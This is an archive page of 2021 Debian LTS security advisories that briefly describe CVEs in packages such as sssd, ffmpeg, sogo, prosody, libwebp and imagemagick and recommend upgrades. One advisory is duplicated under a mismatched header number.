-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2758-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky September 15, 2021https://wiki.debian.org/LTS - - Package: sssd Version: 1.15.0-3+deb9u2 CVE ID : CVE-2021-3621 One security issue has been discovered in sssd. The sssctl command was vulnerable to shell command injection via the logs-fetch and cache-expire subcommands. This flaw allows an attacker to trick the root user into running a specially crafted sssctl command, such as via sudo, to gain root access. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability. For Debian 9 stretch, this problem has been fixed in version 1.15.0-3+deb9u2. We recommend that you upgrade your sssd packages. For the detailed security status of sssd please refer to its security tracker page at: https://security-tracker.debian.org/tracker/sssd Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmFCWGQACgkQ0+Fzg8+n /wboeQ/+J/Y0UfLvGRUnUYaLZjU/8ab+TeN0Bfq3cjxluu3zmmxY9dfZNuHU1dWO UHgmefRAULUaZ6i6tmiTj08gKxSrQu8anNYrZAfEQcBSU/LHlHup1rh2IaD+AoRs iAUaD+VitXrI0tHvHKoomFRjBCAcgdSq30nzVvv4HxuX/I5/ILQ5UMWrvSk/JJb6 t7lgORo9fn82NqTUBtfB7+sBXqeN4mtY5O7ViW/sBbaeZ6V1eRpeM9Ocb07tsPOK ZTtjvrwI0+LtAbozhUK3kCUsVmoMWX4S3g9gOmA9czfy55/r6F7Z1QbEzc9RqnPH 4vJXDwe9rTc/nLoUXIgSgc8Q04/YvdqnpxVPqO0fZ/D+yCrTqSRcuSgPioz85Zjx ei43NgpZMLRheeA6sJKaVNyU5vj7nXgqUosTDS6kGZXHIsm4/DkfLBgp5xM9+I8z As1IkXlK82BWZdXxxfpG+zBzIGrPf2/3OSRBpEOsFMDM4fi6uDxwcldCDcjUCf1h tyUnx4Cvh0npPGiSUtOVjZ6e8KYBLt/R6xPWKxrYJMeBO7nSL0WeblgNC2H0ZofB 1azxhTRpZOMcB/y3cHMl4/hgUDlX9t8rHcvyzDDj22cqHGr0wnGMOHi2hFzF2nSb hvWKset5gDmpuOe9yxzQ3g1LZRenEdVZsoDmYz1l3iixiVW0bWc= =ssLt -END PGP SIGNATURE-
[SECURITY] [DLA 2742-2] ffmpeg regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2742-2debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 22, 2021 https://wiki.debian.org/LTS - - Package: ffmpeg Version: 7:3.2.15-0+deb9u4 During the backporting of one of patches in CVE-2020-22021 one line was wrongly interpreted and it caused the regression during the deinterlacing process. Thanks to Jari Ruusu for the reporting the issue and for the testing of prepared update. For Debian 9 stretch, this problem has been fixed in version 7:3.2.15-0+deb9u4. We recommend that you upgrade your ffmpeg packages. For the detailed security status of ffmpeg please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ffmpeg Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmEiyT4ACgkQ0+Fzg8+n /waoGg//cD08sZ9mZZcnti+jVxUm2JNQKhm5w8djrNP9Dzi+wuhEF+LO6py05P3r UgFDC72uvf4be8BkjbPlZ55R3pM31Vm6372m3jUoXUPuxMDqBbKTgtg1FEdtvpzK bIfb05ixx7Fhpx9OATa1GwypC8vzx25e9vIKA3kWSbOIFK5PADQT4MUNbkwBFD7/ EXWomfAcKF94XTjgsztov4lbgeHmdmKreGLefWnCgFr6Wi0ey8PbGHAb/wGw/BNC XedgcV8Bbr1kbDqJSYvm9q5BvSX2lQInmCaRUNr15wsnq5KzmIQpJ/pvoqAlm48+ EoxxNpz2pnGFTTDkOReREI7rNMLPFaGFP576RGx39sVvDFj3GLURqsyLlRPHfTjs uqdow+Xu3z1PLDH0qqQFJBLk3BWBXzcVKpVNgXVsAKDuDD4YnCQ8F33DWGpSdowL ef73o92lOQoDkA4y5XqY9xdj20SwGGFyMosgrexrrmGzQHVJHY6NpLRWfwdMm3Pn MxUkSKCe4m8vHtTqmXvM1pp5gQO+fPwOU6jM+xCKPIy33xgpMAhyXom1nrtA/KK0 ecX0YcwwwagOak5OzRaqnF0fYsXIJr4RgZJgkqAf+DBoxjNWA3NfGDu6j2zDMzOq zCfjyfoG0opGH2yiaFVm//HsMSRCNKVrcBVReuN7GjkoN14RHbY= =37ez -END PGP SIGNATURE-
[SECURITY] [DLA 2742-1] ffmpeg security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2742-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky August 14, 2021 https://wiki.debian.org/LTS - - Package: ffmpeg Version: 7:3.2.15-0+deb9u3 CVE ID : CVE-2020-21041 CVE-2020-22015 CVE-2020-22016 CVE-2020-22020 CVE-2020-22021 CVE-2020-22022 CVE-2020-22023 CVE-2020-22025 CVE-2020-22026 CVE-2020-22028 CVE-2020-22031 CVE-2020-22032 CVE-2020-22036 CVE-2021-3566 CVE-2021-38114 Multiple issues have been discovered in ffmpeg. CVE-2020-21041 Buffer Overflow vulnerability exists via apng_do_inverse_blend in libavcodec/pngenc.c, which could let a remote malicious user cause a Denial of Service. CVE-2020-22015 Buffer Overflow vulnerability in mov_write_video_tag due to the out of bounds in libavformat/movenc.c, which could let a remote malicious user obtain sensitive information, cause a Denial of Service, or execute arbitrary code. CVE-2020-22016 A heap-based Buffer Overflow vulnerability at libavcodec/get_bits.h when writing .mov files, which might lead to memory corruption and other potential consequences. CVE-2020-22020 Buffer Overflow vulnerability in the build_diff_map function in libavfilter/vf_fieldmatch.c, which could let a remote malicious user cause a Denial of Service. CVE-2020-22021 Buffer Overflow vulnerability at filter_edges function in libavfilter/vf_yadif.c, which could let a remote malicious user cause a Denial of Service. CVE-2020-22022 A heap-based Buffer Overflow vulnerability exists in filter_frame at libavfilter/vf_fieldorder.c, which might lead to memory corruption and other potential consequences. CVE-2020-22023 A heap-based Buffer Overflow vulnerabililty exists in filter_frame at libavfilter/vf_bitplanenoise.c, which might lead to memory corruption and other potential consequences. CVE-2020-22025 A heap-based Buffer Overflow vulnerability exists in gaussian_blur at libavfilter/vf_edgedetect.c, which might lead to memory corruption and other potential consequences. CVE-2020-22026 Buffer Overflow vulnerability exists in the config_input function at libavfilter/af_tremolo.c, which could let a remote malicious user cause a Denial of Service. CVE-2020-22028 Buffer Overflow vulnerability in filter_vertically_8 at libavfilter/vf_avgblur.c, which could cause a remote Denial of Service. CVE-2020-22031 A Heap-based Buffer Overflow vulnerability in filter16_complex_low, which might lead to memory corruption and other potential consequences. CVE-2020-22032 A heap-based Buffer Overflow vulnerability in gaussian_blur, which might lead to memory corruption and other potential consequences. CVE-2020-22036 A heap-based Buffer Overflow vulnerability in filter_intra at libavfilter/vf_bwdif.c, which might lead to memory corruption and other potential consequences. CVE-2021-3566 The tty demuxer did not have a 'read_probe' function assigned to it. By crafting a legitimate "ffconcat" file that references an image, followed by a file the triggers the tty demuxer, the contents of the second file will be copied into the output file verbatim (as long as the `-vcodec copy` option is passed to ffmpeg). CVE-2021-38114 libavcodec/dnxhddec.c does not check the return value of the init_vlc function. Crafted DNxHD data can cause unspecified impact. For Debian 9 stretch, these problems have been fixed in version 7:3.2.15-0+deb9u3. We recommend that you upgrade your ffmpeg packages. For the detailed security status of ffmpeg please refer to its security tracker page at: https://security-tracker.debian.org/tracker/ffmpeg Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmEYnuUACgkQ0+Fzg8+n /wZjLw//SqRxR5dxNq3k6PHU198Mj9rVuPinsKS1yucBMslAznMYYpIC0PWptNVH Dv/5ZFLZg6lMmZJ/okNtwBs/ctJF2mBGUlp8xFgmKJlVmKszM4H2WJzvLivN4nAt IlWCiuS1ODdQEtZOKBiTVi9OEUvjjRZdRFdvmtNlz36ng4mGe2e70sg+leexfhhN lwCuGP1Zq4u/OuxitlP8VlLciGuFPbxnKhN26pHykrdMnkd1VwE3tyDK1T2jKzZX hVbpqhDgxTseo5P7g/+Ciz9rm4yYRTA2njzEN+eyA6AQV8ZrYF259BaWaJLqWvLI RdQmaFeZ3K0DpW3k0PX2BWb0aeV5rltdWjCq12sJr0bMkosEbx2MK0pYdVtCdF1t uo9DmGLpu1ihwF09BpyQ91dC0NYb8n6opB7bGmif76pkLNROmCNqn2G+AKSwSCig w9pY+KFf8U6+888fcjI4I9kupbqDuRIOSvtkdVOxcQF6tmkT+mw8nWsUi2WnAux3 DITYEPQvHPxHcfNCSqwoIRVX17gD1S3CbBfpwYJTMEQMHRbdNaybVmdLQGb
[SECURITY] [DLA 2707-1] sogo security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2707-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky July 12, 2021 https://wiki.debian.org/LTS - - Package: sogo Version: 3.2.6-2+deb9u1 CVE ID : CVE-2021-33054 One security issue has been discovered in sogo. SOGo does not validate the signatures of any SAML assertions it receives. Any actor with network access to the deployment could impersonate users when SAML is the authentication method. For Debian 9 stretch, this problem has been fixed in version 3.2.6-2+deb9u1. We recommend that you upgrade your sogo packages. ATTENTION! If you are using SAML authentication, use sogo-tool to immediately delete users sessions and force all users to visit the login page: sogo-tool -v expire-sessions 1 systemctl restart memcached For the detailed security status of sogo please refer to its security tracker page at: https://security-tracker.debian.org/tracker/sogo Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmDsn0sACgkQ0+Fzg8+n /wYXghAAiA3Qz87G28FyoGMfusI4DD/jNGLzOLnK9o5MFctgD4Lx3mZaphrCM6Za SDAfUaFbM/DQjdDUzEbLTMDt9M3yicplx0xPw57yHBnNJ2VWiLC287KonnaKVgNK Uyw3ZGLS1Ak2nx67z/8o9VZzb9vhBVF1pKFWF3KvbjMMRnUT+sKw4honcjIWz0Rm /Om71twYXjbbx/aHMZjnJlrLiR2dTwbviohYTNAjDMDPbsaiB6JIWCqo0rZOz5A0 4u/ZeZKJzVJ8WU0K1ekCqI0wSFTP4bnpAVyd/vrdapbf6s+BktbqAJ5+BGTFK17+ 14tP36EzAk14/82Wzs6TgalsIsfoEuANfOss/Eqsa1o4G5HhyDGx8f1iQSUL07rg N/AmPzxJRNdjsOAHiztCZAY+99lhgOab7ckEnEaqKgc5fkiU5USAaN1/VBdtiiBX Ssu7+scWApPo7UFays+MO8eNW3y90hwoQLcOZLQwIiIH0cWl4P3wod0Lzu7wJKj5 GhSP7HSqyI+ZrmKGGyfWH38GjhPfMWRUNDTo3CbkIjU1aEjP0vqSQv5CZsqxf0Y7 QTxq3PVxNvzVF112rMalG1MjQACcFFiZ0id8t5LmhYzTrbNmWHCOXq3Bsr0Du1s4 rUIQPZ2m/JePCAWFFJaT56ewStSU5BEO2buNPVcR3wLT3BrKnL8= =QZ0z -END PGP SIGNATURE-
[SECURITY] [DLA 2705-1] scilab security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2705-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky July 07, 2021 https://wiki.debian.org/LTS - - Package: scilab Version: 5.5.2-4+deb9u1 CVE ID : CVE-2021-30485 CVE-2021-31229 CVE-2021-31347 CVE-2021-31348 CVE-2021-31598 Multiple issues have been discovered in scilab, particularly in ezXML embedded library: CVE-2021-30485 Descriptionincorrect memory handling, leading to a NULL pointer dereference in ezxml_internal_dtd() CVE-2021-31229 Out-of-bounds write in ezxml_internal_dtd() leading to out-of-bounds write of a one byte constant CVE-2021-31347, CVE-2021-31348 incorrect memory handling in ezxml_parse_str() leading to out-of-bounds read CVE-2021-31598 Out-of-bounds write in ezxml_decode() leading to heap corruption For Debian 9 stretch, these problems have been fixed in version 5.5.2-4+deb9u1. We recommend that you upgrade your scilab packages. For the detailed security status of scilab please refer to its security tracker page at: https://security-tracker.debian.org/tracker/scilab Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmDnLjIACgkQ0+Fzg8+n /wZCVA//QGHjMXqEDMGgBlKA06HsTifv+EkXWcowJ3AwP1MG8HiasWYovdxqUqvd hFOmsVdYoVDmE9Mb0UvaniRoNavdvKou7I6ZMf4PGnwp+YZulaj5KmdJ4+MVLeVe EPeQB9lz2mVut0wCWMEm665fYGMwGj5beJKdyj6ley8BKs22r8VEotTrP3wvCyh5 sykKPursI3+JLzraTgilk8cn55tl6VY8u/bIVPrT0KHu+Nm+KlKLNLyfjnfJHbl3 LXiNegYWrSzo1Ant3BgdF3jf3RO8n8j7o5ULkIzgQg+sLaC3dOdomJAE2M2kV9ak lYnqeQsjp8ceKdi/kVOIBq5xV4okhztRun5bcu7mhXhzlwGiDmjwvdn6mCbBFzOj 2ov88xwAe+G1GCOhvRaclAaWA3o6fz5oqLTfpsn+DAOSrkR06LAeKYS3Zs8puuD0 ZLQGmH1P+VGZDmwMg9tXNtvajCaHXxMwunSTtN/QhmZM7cGpaAWXfOLIpOzAJ9Rt n6fE9TGWAi8/1MSFKVFeY87SQbkV7nNT9Fb9RXJs8LAhrtgpxEpWRd5wHDTLEPCk IlXhA41iE6sWt+7v11h0fxYajYR61AFygOXlid1PoX6kNcLidSReJLtasdQryHOB 3DzYstcG09q9Lt/EifFQdKsOzncXh/bZL/gphRcVZt/AJ8h3FpA= =Mvga -END PGP SIGNATURE-
[SECURITY] [DLA 2687-2] prosody regression update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2687-2debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 19, 2021 https://wiki.debian.org/LTS - - Package: prosody Version: 0.9.12-2+deb9u4 CVE ID : CVE-2021-32921 It was discovered that the previous upload of the package prosody versioned 0.9.12-2+deb9u3 introduced a regression in the mod_auth_internal_hashed module. Big thanks to Andre Bianchi for the reporting an issue and for testing the update. For Debian 9 stretch, this problem has been fixed in version 0.9.12-2+deb9u4. We recommend that you upgrade your prosody packages. For the detailed security status of prosody please refer to its security tracker page at: https://security-tracker.debian.org/tracker/prosody Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmDNjcAACgkQ0+Fzg8+n /wbPJA/9ExAHfQ83wnMEqtvfdNxEkfFdG2/tbLHeGM3gQy6wEFnfLEVfqINfqshO 4qFIA0/DkZrk7jjD2HrO6XkXdvkC9HezpM98p9sXAMjZagNqXRDPrxpo+yGOOgTp oT74yQ/RFquFyDPs+p98/UUIl27220ktyTXhTRPiVg9PoTL4TTe2aauhV2FPigm5 HQVCH2bKf8A54l6s9t9fUDXokSyeq33JoPxdhVZTRbPLmw860XSfsc5dnE5L4zAC eqjd1Rj+xQ74vBzKJApvILmCkjJrB4CkPWYW92HamZxPVV6Seairle0DBc2VpizV rUiP2BIh4DabfS4R9RwuCCpw70GybqCzbeLhAOnXKMa0j5Ma4XdCWvVwFdpdS5px q1zx9Vk/m0iXsRzTg7Ggjzy8zvu5qF7a7DZi2JrOdlHiIbirPOUz7bCPd1MnA00H 4wlVtfDHFeDgS+wlEnGgoII+SlnUnGw/D+G3QGqnkMkQ6qQSJiOvlWOpGEzdnB9Z hPQhyomDTJSLjOYPlOfRd4rFF/MMiJEKWQDVhyiVjH/dMFZCwmK29ylPkVPrRMDD r6Ahj87qottoh3p93nymLK8q1TKeM3a+rAP4nUKQQtKrMjKi/QhgqHLaQORTV8pV 38hG1xvWHoJjQhu1rL+zBIwKYN0Juxt6ybYnC7te8iwBOneu0IU= =Exn8 -END PGP SIGNATURE-
[SECURITY] [DLA 2687-1] prosody security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2687-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 15, 2021 https://wiki.debian.org/LTS - - Package: prosody Version: 0.9.12-2+deb9u3 CVE ID : CVE-2021-32917 CVE-2021-32921 Two security issues have been discovered in prosody: CVE-2021-32917 The proxy65 component allows open access by default, even if neither of the users has an XMPP account on the local server, allowing unrestricted use of the server's bandwidth. CVE-2021-32921 Authentication module does not use a constant-time algorithm for comparing certain secret strings when running under Lua 5.2 or later. This can potentially be used in a timing attack to reveal the contents of secret strings to an attacker. For Debian 9 stretch, these problems have been fixed in version 0.9.12-2+deb9u3. We recommend that you upgrade your prosody packages. For the detailed security status of prosody please refer to its security tracker page at: https://security-tracker.debian.org/tracker/prosody Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmDJfdIACgkQ0+Fzg8+n /wagXA//UNnOzVde7HdXBCtrlqOOons1VcGkLQ0hoMLLoCcJuJRA+w6LAJUPtuzE 1whyyhyujWC2keXSle+ZH1FfGd3SHwOvodCO2YaqCl8Vy0J05XC/bjYXGkboyIec wO5uSkZo6ABl8L2n6g3CUjcujnUM9FW1qfGF5OLmmNkESVsSck1LskgrV/NjLBEJ xBvz+JafDD8hGzCF9CrMmzBsjYHiCQG9UpfSn9bPAP8HMtv3uwwtV5ydhw+PdCSp OTNdFpURAKoMXxYgkGRglU32ltv7rlOj6ldSHR9eiZleoj2AW2ILpKP1+9e3R7nK uTbgm7WMuM09XeNLwDModXalK+vSsZ/5q2+G9VIKz3m353nmzeQ8328bHiJSdBL9 iRPET0x8/xIoCxQ6uWWXUfQr1SjFJ757Dmd8d2TllVMulX16l2qsYEmOWEHqwkss DysZz3goO/aAknzCrsabdUcRJB+WlER8fBtWDogV7NLQNKjP4+acAlHw9f7CvV5x /Get8Fsnreej5yCvmknfXsmiKnvW/v4SAlLgdYCJ8af1D4CaNL2CjHRj9jtlNzSP m8Z/vYiEZSaTkmaYUMX2OCv6SkmxIWepua2DmJtigPWuJJvBj9Sj4MudIgVzQGbE oOBqTuoTvIxeRXOg8s6JmeC0/CT+nX1c+Ss+vaHcgU64fNX7mmA= =Wp0Z -END PGP SIGNATURE-
[SECURITY] [DLA 2677-1] libwebp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2677-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 05, 2021 https://wiki.debian.org/LTS - - Package: libwebp Version: 0.5.2-1+deb9u1 CVE ID : CVE-2018-25009 CVE-2018-25010 CVE-2018-25011 CVE-2018-25012 CVE-2018-25013 CVE-2018-25014 CVE-2020-36328 CVE-2020-36329 CVE-2020-36330 CVE-2020-36331 Multiple security issues have been discovered in libwebp CVE-2018-25009 An out-of-bounds read was found in function WebPMuxCreateInternal. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25010 An out-of-bounds read was found in function ApplyFilter. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25011 A heap-based buffer overflow was found in PutLE16(). The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2018-25012 An out-of-bounds read was found in function WebPMuxCreateInternal. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25013 An out-of-bounds read was found in function ShiftBytes. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25014 An unitialized variable is used in function ReadSymbol. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36328 A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36329 A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36330 An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2020-36331 An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability. For Debian 9 stretch, these problems have been fixed in version 0.5.2-1+deb9u1. We recommend that you upgrade your libwebp packages. For the detailed security status of libwebp please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libwebp Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmC9FhYACgkQ0+Fzg8+n /wYKAg//f5NtN+jpbgP5uUHiOwTQ8dQvnXY4Up1hz/ag8LzEhS/uZqk9mwyiYpNn Pe5VsgnX3INvuqKEaEA/6O9x6MtC2QBvccZHNVTTCbN6vNfHdtlCUKygmYhfzLoC FnDQd2tpLg0+rhLu3LYrsRSH8Qp0ztzPIOxriPY57GgUdE5oLXLg43bjO9fos9XA 5fOdxA7BkY/QM+HW8Q3Tcw5b09M81xoY8w4gZOAqbkwMY9QnqzLoExzQ2iFrxHXq LGg0mNxwAPQIApG0nxvRfBYTUxmgzoRMCcdz/me8pspxR5hcfO7rORmkk1IVaplE mlDLAA0uxalO2xrraaj/hWRKtaKeUd/LtrCUPme7nEhPJLM9bluE+SrCflzaGMhh 5uKGRgxSjd7U03fzd+BS2C38HLwoyfgR3s3Oq+8CKfhupFbd7R0aP2xEw3ZZWrBR H3di+mc3k4PmL6ho5pTLRz6byKiX4zsVeBkjNniHWh8TVO0lNWYz6ZeRedn6W7x+ iBj500iyf6yhpJdKXhAFPtogNXz6Z+XvrAAeAG7UzzNIqeNK7mbXtxsx9yUIXDd4 peMm03P9661cfxbAwmffv1NU4gbezbsNRUtyhQrsU8faFVqOZYQGDZsvm22KU3iL BxroXuqB68K2QuGcM1H/N9luf2lL3QUBzLip2EBRUkzwkLCVjME= =4dOP -END PGP SIGNATURE-
[SECURITY] [DLA 2672-1] libwebp security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2677-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 05, 2021 https://wiki.debian.org/LTS - - Package: libwebp Version: 0.5.2-1+deb9u1 CVE ID : CVE-2018-25009 CVE-2018-25010 CVE-2018-25011 CVE-2018-25012 CVE-2018-25013 CVE-2018-25014 CVE-2020-36328 CVE-2020-36329 CVE-2020-36330 CVE-2020-36331 Multiple security issues have been discovered in libwebp CVE-2018-25009 An out-of-bounds read was found in function WebPMuxCreateInternal. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25010 An out-of-bounds read was found in function ApplyFilter. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25011 A heap-based buffer overflow was found in PutLE16(). The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2018-25012 An out-of-bounds read was found in function WebPMuxCreateInternal. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25013 An out-of-bounds read was found in function ShiftBytes. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2018-25014 An unitialized variable is used in function ReadSymbol. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36328 A heap-based buffer overflow in function WebPDecodeRGBInto is possible due to an invalid check for buffer size. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36329 A use-after-free was found due to a thread being killed too early. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability. CVE-2020-36330 An out-of-bounds read was found in function ChunkVerifyAndAssign. The highest threat from this vulnerability is to data confidentiality and to the service availability. CVE-2020-36331 An out-of-bounds read was found in function ChunkAssignData. The highest threat from this vulnerability is to data confidentiality and to the service availability. For Debian 9 stretch, these problems have been fixed in version 0.5.2-1+deb9u1. We recommend that you upgrade your libwebp packages. For the detailed security status of libwebp please refer to its security tracker page at: https://security-tracker.debian.org/tracker/libwebp Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmC7t8MACgkQ0+Fzg8+n /wY3MQ/9HJZ/ZRdebr6kVrI2Kft17rJcL5Yrad4CkY2hGDShH9I1a9hrxxnY5o6K t9xHMJB3BzQPECL+4zSOHlJYoZ+J7eHtU1MO6FytWw8NW761f7IEV3C7f72uq1hQ hRHMPIpZUw5SEWjIFCef42yEV+LViVvugLWKYR3I8ZAQK+Cddz6m1KlMpow7ZEQj uSljS3Y1Qsm8puDpKEIYJL+DKkKyasNeAf1jwZwymTCFei5AFK/ISDCMi6VDt5A1 TOYG0dmwFXwIrHaRAPPh36j0Y9Z1KzlX4mH//rDfxI7U3uXlP/zTdSuREMCVZ2lH ApmkCV4GDlpCZW/2xwchCkPrks6/KLzRjvShzKxoBBn7dbJef88LxgYOazyEua8O 5kGQL6QGsfPnWiyBfW4TGsN2/UzIx3kpKwr8C1OLecoRVaG7bueznJBFTpXlH7q2 +Wve5sWDCctzDVzyjEi/N7T+VsfFJPZjSBty0aYNyttpVJCHU0yGTh9YslFTxPsA lEYzVvAGujTPr29x43aBUotXa3XjZfBPEHTj/SQWR9SqQ9ORunsmgsJigrajJeYj mqWmTrjbq1zhto7zpyF6ZP2r2vKdYU/p1nWDPS/KXQHQUqhZRCf0QjfH1G6NBDWj JLxHPIQt8zLk97HkaczFJGXNugWNe66i6a3q7GfDc/ym88feDXk= =3iR4 -END PGP SIGNATURE-
[SECURITY] [DLA 2672-1] imagemagick security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian LTS Advisory DLA-2672-1debian-...@lists.debian.org https://www.debian.org/lts/security/ Anton Gladky June 02, 2021 https://wiki.debian.org/LTS - - Package: imagemagick Version: 8:6.9.7.4+dfsg-11+deb9u13 CVE ID : CVE-2020-27751 CVE-2021-20243 CVE-2021-20245 CVE-2021-20309 CVE-2021-20312 CVE-2021-20313 Multiple security issues have been discovered in imagemagick. CVE-2020-27751 A flaw was found in MagickCore/quantum-export.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of values outside the range of type `unsigned long long` as well as a shift exponent that is too large for 64-bit type. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. CVE-2021-20243 A flaw was found in MagickCore/resize.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. CVE-2021-20245 A flaw was found in coders/webp.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. CVE-2021-20309 A division by zero in WaveImage() of MagickCore/visual-effects.c may trigger undefined behavior via a crafted image file submitted to an application using ImageMagick. CVE-2021-20312 An integer overflow in WriteTHUMBNAILImage of coders/thumbnail.c may trigger undefined behavior via a crafted image file that is submitted by an attacker and processed by an application using ImageMagick. CVE-2021-20313 A potential cipher leak when the calculate signatures in TransformSignature is possible. For Debian 9 stretch, these problems have been fixed in version 8:6.9.7.4+dfsg-11+deb9u13. We recommend that you upgrade your imagemagick packages. For the detailed security status of imagemagick please refer to its security tracker page at: https://security-tracker.debian.org/tracker/imagemagick Further information about Debian LTS security advisories, how to apply these updates to your system and frequently asked questions can be found at: https://wiki.debian.org/LTS -BEGIN PGP SIGNATURE- iQIzBAEBCgAdFiEEu71F6oGKuG/2fnKF0+Fzg8+n/wYFAmC4YaYACgkQ0+Fzg8+n /wYMuw//ZsXNvwxPZRk252ZwNcHveR/+5dRe93CB+WSGBbUqaTSfQzvqM9DLQxZi G9D2srgZK+yg1kev4Wa3FufpEjJkE3YFWLvEjhBhqAuj+Px1y/K3YNaRhPw1xC0o z7GIyoLWi3jAsyyZnOJupUfPpo+ac6yFcT1eAYGMS2hLS6WDx/32l+YBflYKWja0 eqIWfgXwxSA6uaTjV4SNc6JP1VqoA44ZJE7sS9R9oYhR5ewkQ+rDIDfAHyOG/gk/ EG0UwbZZWlpVsPzvEHZxanr2A2+GvJZ3AQ1hirlbWyGcf4Jv4uJ/Xw8jdH7rG1EE VgqEFHGRVznAQXmbGDPvoREMgSQiYd0yWYs0yVqUGT0Asp5nyr+1bDna8irG5cok 1Ubg+u6YquUa2PPbmWp7zK6+7o4A6PW48mAt29YwIM8vrZE4AV3fW6a4XXWEeuTB wu3ljrhmYPmm9hO9eG8RrK8810+wDCnTeX9lXI2pDF/9dcllXku/ArtXR+e0Ejxv xESCkYOjVEY7MCVwuNvVZE197LAXqctUQ7aoTpixnulmTpmmx9OG0Wg8DbQhS1cI XFJXBL9tmYuN2dwzk7R8trOtZWl2rDzHbxPXR3EFO/fU+cjCMRMfKt90Ed6bKmfd 4v6AXVWZXSow02IDi5Nud+L6FAQZ9ZkjLjOK9Updboe7MoIIy2A= =e6iK -END PGP SIGNATURE-
[SECURITY] [DLA 2660-1] libgetdata security update
